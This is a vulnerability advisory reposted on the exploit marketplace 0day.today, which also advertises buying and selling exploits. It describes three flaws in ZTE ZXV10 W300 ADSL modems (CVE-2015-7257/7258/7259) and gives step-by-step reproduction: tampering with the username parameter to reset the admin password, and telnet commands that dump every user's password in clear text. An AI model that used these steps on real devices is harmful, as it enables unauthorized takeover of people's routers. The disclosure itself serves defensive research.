0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities
# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities] # Discovered by: Karn Ganeshen # Vendor Homepage: [www.zte.com.cn] # Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57] *CVE-ID*: CVE-2015-7257 CVE-2015-7258 CVE-2015-7259 *Note*: Large deployment size, primarily in Peru, used by TdP. 1 *Insufficient authorization controls* *CVE-ID*: CVE-2015-7257 Observed in Password Change functionality. Other functions may be vulnerable as well. *Expected behavior:* Only administrative 'admin' user should be able to change password for all the device users. 'support' is a diagnostic user with restricted privileges. It can change only its own password. *Vulnerability:* Any non-admin user can change 'admin' password. *Steps to reproduce:* a. Login as user 'support' password XXX b. Access Password Change page - http://<IP>/password.htm c. Submit request d. Intercept and Tamper the parameter username change from 'support' to 'admin' e. Enter the new password > old password is not requested > Submit > Login as admin -> Pwn! 2 *Sensitive information disclosure - clear-text passwords* *CVE-ID*: CVE-2015-7258 Displaying user information over Telnet connection, shows all valid users and their passwords in clear-text. *Steps to reproduce:* $ telnet <IP> Trying <IP>... Connected to <IP>. Escape character is '^]'. User Access Verification Username: admin Password: < admin/XXX1 $sh ADSL#login show <-- shows user information Username Password Priority admin password1 2 support password2 0 admin password3 1 3 *(Potential) Backdoor account feature - **insecure account management* *CVE-ID*: CVE-2015-7259 Same login account can exist on the device, multiple times, each with different priority#. It is possible to log in to device with either of the username/password combination. It is considered as a (redundant) login support *feature*. *Steps to reproduce:* $ telnet <IP> Trying <IP>... Connected to <IP>. Escape character is '^]'. User Access Verification User Access Verification Username: admin Password: <-- admin/password3 $sh ADSL#login show Username Password Priority admin password1 2 support password2 0 admin password3 1 +++++ -- Best Regards, Karn Ganeshen # 0day.today [2024-09-17] #